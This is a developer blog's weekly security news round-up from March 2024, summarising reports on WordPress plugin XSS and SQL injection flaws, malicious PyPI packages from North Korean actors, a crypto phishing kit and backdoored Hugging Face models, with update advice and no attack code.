Security news weekly round-up - 1st March 2024

Habdul Hazeez - Mar 1 - - Dev Community

Introduction

Hello there. In this week's review, we'll cover social media, WordPress plugin vulnerabilities, phishing, and backdoors.


10 things to avoid posting on social media – and why

If you read the article's title and you are like "I know that already", then, think again. Stop whatever you're doing now, and read the article.

The following should get you started:

It might sound pretty innocuous to post a pic or an update saying you’re excited about an upcoming holiday. But it could signify to someone monitoring your account that your property will be left unattended during that time.

WordPress LiteSpeed Plugin Vulnerability Puts 5 Million Sites at Risk

It is scary and luckily, it was patched in LiteSpeed version 5.7.0.1. So, if you have a version that's less than that, update it immediately.

Here is why:

This plugin suffers from unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request

WordPress Plugin Alert - Critical SQLi Vulnerability Threatens 200K+ Websites

It's a plugin called Ultimate Member and if you have a version lesser than 2.8.3, update it immediately. Stay safe and read more below 👇

the plugin is "vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query

Japan warns of malicious PyPi packages created by North Korean hackers

The good news from this article: they have taken the packages offline. The bad news: thousands have downloaded them before they did. It's not good 😞.

Here is why:

The Japanese cybersecurity agency says that the final payload (IconCache.db), executed in memory, is a malware known as "Comebacker," first identified by Google analysts in January 2021, who reported that it was used against security researchers.

The Comebacker malware connects to the attacker's command and control (C2) server, sends an HTTP POST request with encoded strings, and waits for further Windows malware to be loaded in memory.

New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users

Attackers can do anything to get your money and this article proves this. Watch out and stay safe.

More for you:

Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

No system is safe.

Here is an excerpt from the article:

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week, and I'll see you next time.

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .